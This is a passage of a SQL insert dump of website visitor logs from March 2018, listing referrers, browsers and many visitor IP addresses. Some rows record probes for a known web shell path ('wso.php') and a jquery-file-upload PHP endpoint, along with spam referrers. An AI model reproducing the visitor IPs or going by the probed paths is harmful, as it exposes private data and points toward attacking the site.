.facebook.com','AppleWebKit','iPhone','604.5.6','','174.204.1.204','000',2,0),(27186,'2018-03-22','https://zphiblgz.org','Safari','iPhone','11.0','','208.54.99.211','000',3,0),(27187,'2018-03-22','android-app://com.google.android.gm','Chrome','Android','65.0.3325.109','','173.64.82.150','000',2,0),(27188,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','601.1.46','','71.179.84.19','000',2,0),(27189,'2018-03-22','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',1,0),(27190,'2018-03-22','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(27191,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.104','000',2,0),(27192,'2018-03-22','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(27193,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','76.21.167.41','000',1,0),(27194,'2018-03-22','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(27195,'2018-03-22','https://zphiblgz.org','Edge','Windows','16.16299','','68.134.9.53','000',7,0),(27196,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','99.119.249.189','000',2,0),(27197,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','75.176.10.208','000',2,0),(27198,'2018-03-22','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(27199,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(27200,'2018-03-22','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','100.36.84.244','000',1,0),(27201,'2018-03-22','https://zphiblgz.org','Safari','Macintosh','11.0.3','','88.198.43.207','000',1,0),(27202,'2018-03-22','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','71.244.128.30','000',2,0),(27203,'2018-03-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(27204,'2018-03-22','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.35','000',1,0),(27205,'2018-03-22','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(27206,'2018-03-22','https://zphiblgz.org','Chrome','Windows','36.0.1985.67','','188.162.200.223','000',1,0),(27207,'2018-03-22','https://www.google.com/','Safari','Macintosh','11.0.3','','75.176.50.40','000',2,0),(27208,'2018-03-22','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(27209,'2018-03-22','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(27210,'2018-03-22','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(27211,'2018-03-22','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(27212,'2018-03-22','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.196.86.66','000',1,0),(27213,'2018-03-22','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.229.100.252','000',1,0),(27214,'2018-03-22','https://zphiblgz.org','Chrome','Chrome OS','64.0.3282.190','','69.143.35.179','000',3,0),(27215,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','192.254.250.181','000',1,0),(27216,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.152.112','000',1,0),(27217,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','5.61.27.117','000',1,0),(27218,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','183.111.174.4','000',1,0),(27219,'2018-03-22','https://zphiblgz.org','MSIE','Windows','11.0','','46.229.170.197','000',1,0),(27220,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.30','000',1,0),(27221,'2018-03-22','http://deart-13.ru/','Unknown','Unknown','Unknown','','37.115.112.228','000',3,0),(27222,'2018-03-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(27223,'2018-03-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(27224,'2018-03-22','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.20.214','000',2,0),(27225,'2018-03-23','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','68.33.90.112','000',2,0),(27226,'2018-03-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','146.185.223.150','000',1,0),(27227,'2018-03-23','http://zphiblgz.org','Safari','Macintosh','11.0.1','','172.82.177.116','000',1,0),(27228,'2018-03-23','http://www.openurls.com.cn/','Firefox','Windows','52.0','','45.33.50.172','000',2,0),(27229,'2018-03-23','http://www.openurls.com.cn/','Chrome','Windows','53.0.2785.104','','61.129.6.148','000',1,0),(27230,'2018-03-23','https://zphiblgz.org','Android Browser','Android','4.0','','101.226.33.224','000',1,0),(27231,'2018-03-23','http://pospektr.ru/','MSIE','Windows','6.0','','46.118.152.50','000',1,0),(27232,'2018-03-23','https://www.sundrugstore.com/','MSIE','Unknown','7.0b','','178.137.86.152','000',2,0),(27233,'2018-03-23','https://zphiblgz.org','MSIE','Windows','6.0','','185.5.249.220','000',2,0),(27234,'2018-03-23','http://slomm.ru/','MSIE','Windows','7.0','','46.119.121.22','000',2,0),(27235,'2018-03-23','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(27236,'2018-03-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(27237,'2018-03-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',1,0),(27238,'2018-03-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(27239,'2018-03-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1735._TdFYSHu4DHgxzOH0PKaX5WitMrVYm53RJ8XjnRyC-g.7e068628515b0595c0c94c1ce725b28a28d563f6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZFZXOUdiOTJJY2VrZlVhVFRGSVJNd19mSWJMdUgtcXRzaXhZQTFYSHFKUSws&sign=20f91c865bbb7a9ffd3d5ae7e15848cc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.220.66','000',2,0),(27240,'2018-03-23','https://zphiblgz.org','MSIE','Windows','11.0','','208.253.105.254','000',2,0),(27241,'2018-03-23','http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarship&h=ATPKu1aaN-FMMIkbgl5I8hUnjVzaLRmADlp78J_ieW26O0DgPrsNw8mm7bwKogPfRGuy625JsTlz2OJpYIVHkrsQeo_aQKWR-TmeYM1JTddMJIgZXE3131zGGQTF_falvw','MSIE','Windows','11.0','','12.183.19.14','000',3,0),(27242,'2018-03-23','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','51.255.48.153','000',2,0),(27243,'2018-03-23','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.76','000',11,0),(27244,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.204.66','000',5,0),(27245,'2018-03-23','http://zphiblgz.org/','MSIE','Windows','6.0','','103.216.239.35','000',2,0),(27246,'2018-03-23','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.161','000',1,0),(27247,'2018-03-23','https://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.24.225','000',1,0),(27248,'2018-03-23','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.71','000',6,0),(27249,'2018-03-23','https://workius.ru/','MSIE','Unknown','6.0','','178.137.91.90','000',3,0),(27250,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.85','000',3,0),(27251,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.86','000',21,0),(27252,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.82','000',4,0),(27253,'2018-03-23','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(27254,'2018-03-23','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(27255,'2018-03-23','https://zphiblgz.org','SamsungBrowser','Android','6.4','','50.225.39.86','000',15,0),(27256,'2018-03-23','https://zphiblgz.org','Edge','Windows','16.16299','','71.244.255.160','000',8,0),(27257,'2018-03-23','https://zphiblgz.org','Python-urllib','Unknown','2.7','','89.36.215.140','000',11,0),(27258,'2018-03-23','https://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.227.0.143','000',2,0),(27259,'2018-03-23','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.29','000',1,0),(27260,'2018-03-23','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','194.44.247.218','000',2,0),(27261,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.173.112','000',3,0),(27262,'2018-03-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(27263,'2018-03-23','https://loading-please-waitwork.blogspot.com/b/app-preview?token=ZcAAVmIBAAA.0SOZ3NUDb8N3GrkRMEOvugFLP8t8uo-bNmkVnwsbvr-Mb9-bs8O2HC7mopoIKEcJ.M_4oKRBSYqyPWIWeVXM8gg','Opera Next','Windows','51.0.2830.55','','41.200.161.245','000',1,0),(27264,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','99.203.16.6','000',8,0),(27265,'2018-03-23','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','86.9.181.227','000',2,0),(27266,'2018-03-23','https://zphiblgz.org','ok','Unknown','3.2.0','','54.221.149.113','000',2,0),(27267,'2018-03-23','https://thelma.blog1989.com','Firefox','Windows','58.0','','112.5.248.223','000',2,0),(27268,'2018-03-23','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(27269,'2018-03-23','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(27270,'2018-03-23','http://zphiblgz.org/','Chrome','Windows','33.0.1750.146','','195.22.125.74','000',2,0),(27271,'2018-03-23','https://zphiblgz.org','Chrome','Android','65.0.3325.109','','96.244.195.93','000',6,0),(27272,'2018-03-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(27273,'2018-03-23','https://www.google.com/search?q=mary+bell+-+zeta+phi+beta+xi+gamma+chapter&ie=utf-8&oe=utf-8&client=firefox-b','Firefox','Android','59.0','','174.233.139.102','000',3,0),(27274,'2018-03-23','http://www.zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','207.244.149.26','000',2,0),(27275,'2018-03-23','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','65.0.3325.162','','73.200.187.175','000',1,0),(27276,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','208.54.35.249','000',2,0),(27277,'2018-03-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(27278,'2018-03-23','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.123','000',1,0),(27279,'2018-03-23','https://zphiblgz.org','Firefox','Windows','57.0','','52.165.148.51','000',1,0),(27280,'2018-03-23','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(27281,'2018-03-23','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(27282,'2018-03-23','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(27283,'2018-03-23','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','67.215.191.152','000',2,0),(27284,'2018-03-23','http://m.facebook.com','AppleWebKit','iPod','604.5.6','','32.210.166.187','000',2,0),(27285,'2018-03-23','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','73.128.241.230','000',9,0),(27286,'2018-03-23','https://zphiblgz.org','Safari','iPhone','11.0','','68.33.93.170','000',3,0),(27287,'2018-03-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.147','000',2,0),(27288,'2018-03-23','https://studentguide.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(27289,'2018-03-23','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.8','000',1,0),(27290,'2018-03-23','https://zphiblgz.org/service/appa/','Chrome','Linux','41.0.2272.118','','66.249.80.12','000',1,0),(27291,'2018-03-23','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(27292,'2018-03-24','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.177.68.54','000',2,0),(27293,'2018-03-24','http://gazel-72.ru/','MSIE','Windows','5.0','','134.249.55.53','000',2,0),(27294,'2018-03-24','https://zphiblgz.org','Firefox','Linux','42.0','','185.198.167.29','000',2,0),(27295,'2018-03-24','http://03p.info/','MSIE','Windows','6.0','','46.118.113.100','000',3,0),(27296,'2018-03-24','https://zphiblgz.org','Chrome','Linux','51.0.2724.86','','94.255.168.52','000',1,0),(27297,'2018-03-24','http://zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','207.244.149.26','000',1,0),(27298,'2018-03-24','https://zphiblgz.org/','AppleWebKit','Windows','534','','40.77.178.133','000',1,0),(27299,'2018-03-24','https://hentai-manga.porn/','Opera','Windows','7.54','','46.118.113.100','000',1,0),(27300,'2018-03-24','http://incitystroy.ru/','MSIE','Windows','5.5','','46.118.113.100','000',2,0),(27301,'2018-03-24','http://komputers-best.ru/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(27302,'2018-03-24','https://zphiblgz.org','Chrome','Android','55.0.2883.91','','68.134.33.60','000',13,0),(27303,'2018-03-24','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(27304,'2018-03-24','https://zphiblgz.org','Safari','iPhone','11.0','','71.126.169.163','000',2,0),(27305,'2018-03-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1736.bWlDIt2NIG_zCKAhEXOqt2fpQkYi6YiRCnSnRPKbTjk.234549f2602d70bb89fe4070eb3fb157d61392db&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040S2lPLU1Na2Zhd3YzbXk1NWMtdkdXNTJxWkRUT2V5djdBWFB1NFdnX3FoQSws&sign=1986565cbe6485021491a07387522cc2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.33.120','000',2,0),(27306,'2018-03-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.215.74.128','000',1,0),(27307,'2018-03-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1736.CR7863nbhAT_-HaXKJ_AjaMa74iXSj0vf1avYGjO6QI.2d3bb51aab02c4790963ab506e87b4eaa0f0188a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040VnVXZG04TXJkc0x4aHNWVFVZMldLaW13WEhXbUo3QTFicWJ4M21sRHZldyws&sign=968705bd4bf4ff1fafebfe6a016eb84c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.99.10','000',2,0),(27308,'2018-03-24','https://zphiblgz.org','Firefox','Windows','32.0','','103.212.43.8','000',1,0),(27309,'2018-03-24','http://polyana-skazok.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(27310,'2018-03-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1736.ZhuKbmknXfQhJsABQA_Ene7mtZbyFzJqiircBLyAjeI.699fa188d137286e0f5bd55bb2cfbb1d95524950&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RE5ldUhKMjBHZUgxMmNSWXJ3VVpOZUZxTnNaWWMyY2N3OW9udWtfZUpGZyws&sign=e2816732715d965a149c7730f5d8b224&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.118.74','000',2,0),(27311,'2018-03-24','https://zphiblgz.org','Firefox','Windows','3.1b3','','178.175.82.197','000',1,0),(27312,'2018-03-24','http://msu.kharkov.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(27313,'2018-03-24','https://zphiblgz.org','Firefox','Windows','50.0','','217.61.125.174','000',1,0),(27314,'2018-03-24','https://www.google.com/','Safari','iPhone','11.0','','99.72.172.66','000',2,0),(27315,'2018-03-24','https://laminat.com.ua/','MSIE','Windows','6.0','','178.137.86.152','000',3,0),(27316,'2018-03-24','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','67.81.58.65','000',4,0),(27317,'2018-03-24','https://zphiblgz.org','Firefox','Windows','40.1','','60.52.104.41','000',2,0),(27318,'2018-03-24','https://www.google.com/','Chrome','Windows','65.0.3325.181','','71.166.46.215','000',32,0),(27319,'2018-03-24','http://www.google.com/','Chrome','Android','65.0.3325.109','','50.225.39.75','000',3,0),(27320,'2018-03-24','http://profnastil-moscow.ru/','MSIE','Windows','7.0a1','','134.249.55.53','000',1,0),(27321,'2018-03-24','http://zphiblgz.org/','Edge','Macintosh','36.12064','','51.15.157.219','000',2,0),(27322,'2018-03-24','https://zphiblgz.org','Safari','iPhone','11.0','','99.203.16.121','000',2,0),(27323,'2018-03-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(27324,'2018-03-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1736.jAs6MDWAdBIu2SRdW6oGd1c_qqc6acmpOx1os2HV7Fo.145bfff4d2485944f00410ef5a8392fd9bcb97b0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QXRqSFNtUTJJVFh4ajVQeXRYMURVQXRUd0UyX3FvZUdzczI0TmFyTFhKdyws&sign=3accc17ea24f3dc18ff1f3d612008104&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.18.86','000',2,0),(27325,'2018-03-24','https://www.google.com/','Chrome','Windows','65.0.3325.181','','73.200.188.232','000',9,0),(27326,'2018-03-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1736.w1i8kKsnU4kFX9xMhWCuZpbtjQHLx20X7cPCnm2_blk.22e684048aba11aaf0997a1b829fc91aae23f1c5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040eTBLRE9xQkY1dEFjV09hREVpRVpiNjJqWE1hY3F2TEU3ZXZBS1RiWHMydyws&sign=9a9cd483433afb7804a389610a705b9f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','83.136.249.195','000',2,0),(27327,'2018-03-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1736.GUWpfJJ69xHhTZUUD0nIYj7Z-1zS6bIivpcNkgNIqDo.b04d9804aae746b6644f5ed646202853fdbcde69&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040T0RCNXlFVnA4LWVNUXhvT0JqLTBkWXZMajlJWTNyZ2FaT3ZMTEprb083dyws&sign=9542742d8085f17a48f561c98f87d046&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.75.10.253','000',2,0),(27328,'2018-03-24','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(27329,'2018-03-24','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(27330,'2018-03-24','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','192.126.251.221','000',2,0),(27331,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','107.77.203.124','000',15,0),(27332,'2018-03-24','http://m.facebook.com','Safari','iPhone','11.0','','173.252.98.82','000',2,0),(27333,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','73.39.65.233','000',1,0),(27334,'2018-03-24','http://www.google.com/','Chrome','Android','65.0.3325.109','','172.58.225.52','000',4,0),(27335,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','98.204.58.35','000',1,0),(27336,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','100.36.181.83','000',1,0),(27337,'2018-03-24','https://zphiblgz.org/','Firefox','Macintosh','57.0','','185.164.59.212','000',1,0),(27338,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','108.31.210.225','000',1,0),(27339,'2018-03-24','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',3,0),(27340,'2018-03-24','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(27341,'2018-03-24','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(27342,'2018-03-24','http://m.facebook.com','AppleWebKit','iPad','604.5.6','','173.79.36.153','000',1,0),(27343,'2018-03-24','http://m.facebook.com/','Chrome','Android','65.0.3325.109','','70.170.53.49','000',1,0),(27344,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','73.172.62.245','000',1,0),(27345,'2018-03-24','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',6,0),(27346,'2018-03-24','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',8,0),(27347,'2018-03-24','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(27348,'2018-03-24','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.35','000',1,0),(27349,'2018-03-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.158.57','000',8,0),(27350,'2018-03-24','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.158.57','000',1,0),(27351,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','71.114.37.67','000',3,0),(27352,'2018-03-24','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.120','000',2,0),(27353,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','72.73.26.91','000',1,0),(27354,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','71.179.18.43','000',1,0),(27355,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','107.77.203.189','000',1,0),(27356,'2018-03-24','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',2,0),(27357,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','69.143.196.206','000',1,0),(27358,'2018-03-24','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','81.19.186.248','000',1,0),(27359,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','24.126.169.199','000',1,0),(27360,'2018-03-24','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.11.167.4','000',1,0),(27361,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','108.56.204.96','000',1,0),(27362,'2018-03-24','https://zphiblgz.org','Safari','iPhone','11.0','','69.143.35.179','000',3,0),(27363,'2018-03-24','https://zphiblgz.org','MSIE','Windows','6.0','','89.223.30.116','000',4,0),(27364,'2018-03-24','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(27365,'2018-03-24','https://m.facebook.com/','Safari','iPhone','11.0','','68.134.6.95','000',4,0),(27366,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','71.121.167.102','000',2,0),(27367,'2018-03-24','https://zphiblgz.org','MSIE','Windows','11.0','','173.64.85.9','000',14,0),(27368,'2018-03-24','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(27369,'2018-03-24','https://m.facebook.com/','Chrome','Android','64.0.3282.137','','99.203.17.148','000',2,0),(27370,'2018-03-24','https://zphiblgz.org','MSIE','Windows','11.0','','144.76.71.83','000',1,0),(27371,'2018-03-24','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.104','000',3,0),(27372,'2018-03-24','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','108.31.242.23','000',1,0),(27373,'2018-03-24','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','185.127.17.182','000',2,0),(27374,'2018-03-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.254.123','000',1,0),(27375,'2018-03-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(27376,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','107.77.196.126','000',1,0),(27377,'2018-03-25','http://lerporn.info/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(27378,'2018-03-25','http://deart-13.ru/','Unknown','Unknown','Unknown','','37.115.112.228','000',3,0),(27379,'2018-03-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(27380,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','100.15.190.26','000',1,0),(27381,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','69.140.70.45','000',1,0),(27382,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','100.36.173.234','000',1,0),(27383,'2018-03-25','https://zphiblgz.org','Firefox','Windows','40.1','','42.0.5.235','000',2,0),(27384,'2018-03-25','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','94.23.27.166','000',2,0),(27385,'2018-03-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1737._pCHcikO8LEhsu2-l0oHX_k5M9peETykZulXjKCA8bk.ea3b04427a05744a0f577da2deb91e1ef933ac6e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SlRRVDNIbDVsTHpvZWlmX3RQdXp0Ums2WFhEQkdXcFBMUjhLdHM2UTNMdyws&sign=63748c997db40fea6ba809657b093c8d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.183.35.58','000',2,0),(27386,'2018-03-25','https://zphiblgz.org','MSIE','Windows','6.0','','89.223.28.241','000',4,0),(27387,'2018-03-25','https://zphiblgz.org','Firefox','Macintosh','45.0','','85.143.222.0','000',61,0),(27388,'2018-03-25','zphiblgz.org/wso.php','Firefox','Windows','52.0','','178.137.16.151','000',1,0),(27389,'2018-03-25','https://zphiblgz.org','Safari','Linux','7.0','','94.130.167.247','000',5,0),(27390,'2018-03-25','https://www.google.com/','Chrome','Windows','64.0.3282.186','','173.29.252.8','000',4,0),(27391,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','108.18.238.242','000',1,0),(27392,'2018-03-25','https://exdocsfiles.com/','MSIE','Windows','3.02','','134.249.55.53','000',2,0),(27393,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','101.178.45.200','000',1,0),(27394,'2018-03-25','http://zahvat.ru/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(27395,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','96.231.135.40','000',1,0),(27396,'2018-03-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1737.J08-c-I5ybdfm4xF20D-2fKOsV57anBi5-I7mz-ehOM.cae0bf5ef87fd2579729780e139145ce1241fe69&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUF